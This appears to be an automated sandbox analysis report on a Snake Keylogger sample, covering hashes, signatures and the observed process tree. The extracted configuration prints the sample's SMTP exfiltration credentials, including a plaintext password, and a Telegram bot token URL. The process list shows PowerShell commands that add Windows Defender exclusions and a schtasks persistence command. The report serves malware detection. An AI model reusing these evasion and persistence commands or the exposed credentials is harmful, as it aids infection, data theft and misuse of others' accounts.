Analysis
-
max time kernel
43s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
11-12-2024 15:52
Static task
static1
Behavioral task
behavioral1
Sample
e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe
-
Size
886KB
-
MD5
e22f1bbf54fbbd8d0135772dac71ac13
-
SHA1
b44ed322c53cb34c9eb7988c65be76eb7c78f089
-
SHA256
9e4e77d4f212e5aad71c2a0409c801b64e89b9f92a0ce4e2903b587bc5a70485
-
SHA512
2e577425a1d81e682777ae7b8c0dd9718923f6c0b2367a0096b7aa803bfb21eb02a4ded17600f6f9767b5ab853ddff56ebd8b39dd0ab8da341257d2e50aa3d58
-
SSDEEP
24576:14njPTfWh2y0ukcncNmGgvYTDn2KSQjHT5GA2ekyFh3C0cq:mmGhDneeQHMh3C0cq
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.vlccwellness.com - Port:
587 - Username:
[email protected] - Password:
taiyab31121984 - Email To:
[email protected]
https://api.telegram.org/bot1865023387:AAFbWPISsv486p_o9A4CIDR1FBfAq1W7nUc/sendMessage?chat_id=1788371409
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 5 IoCs
resource yara_rule behavioral1/memory/2636-30-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2636-26-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2636-31-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2636-24-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2636-29-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2132 powershell.exe 2704 powershell.exe 2224 powershell.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 checkip.dyndns.org 8 freegeoip.app 9 freegeoip.app -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1324 2636 WerFault.exe 39 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2244 schtasks.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 108 wrote to memory of 2224 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 31 PID 108 wrote to memory of 2224 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 31 PID 108 wrote to memory of 2224 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 31 PID 108 wrote to memory of 2224 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 31 PID 108 wrote to memory of 2132 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 33 PID 108 wrote to memory of 2132 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 33 PID 108 wrote to memory of 2132 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 33 PID 108 wrote to memory of 2132 108 e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NEQcsxsAehXEc.exe"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2132
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NEQcsxsAehXEc" /XML "C:\Users\Admin\AppData\Local\Temp\tmp675B.tmp"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2244
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NEQcsxsAehXEc.exe"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e22f1bbf54fbbd8d0135772dac71ac13_JaffaCakes118.exe"2⤵PID:2636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 15763⤵
- Program crash
PID:1324
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD549d592a6b10ab0a13ebe55ccc57bcce1
SHA1d80e7000f901cd8c14e295c81e8834bc11b146c2
SHA256537376a29b63e04a385acb016c76ed05bd67468f327093bc9f5f662b4e1a09f8
SHA5128f9ee6ce4c69aebc2ec48c5004d30e5afe22c3f9291d0e743521846316012fe66a864f4e5dafcb2f69156234079c34a549c46c07d6ba6eaba8a1e467135cb15a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD54fecb847027a7fbb654f0882205316a2
SHA17139e5c31bd9dbb4d018cc014f683687a3620a18
SHA256a5b12dc115ea163cc7c53e9f03852f522fd9131080c1d7942bd00a4593d984c7
SHA512c6ee301d9b3821874dc1c48761775c95ce504fcee4b0836021964602b59974f1bb30c4392e0f45a21344d1dd33fcb24148d530c1664957b4c3261fd427ffa153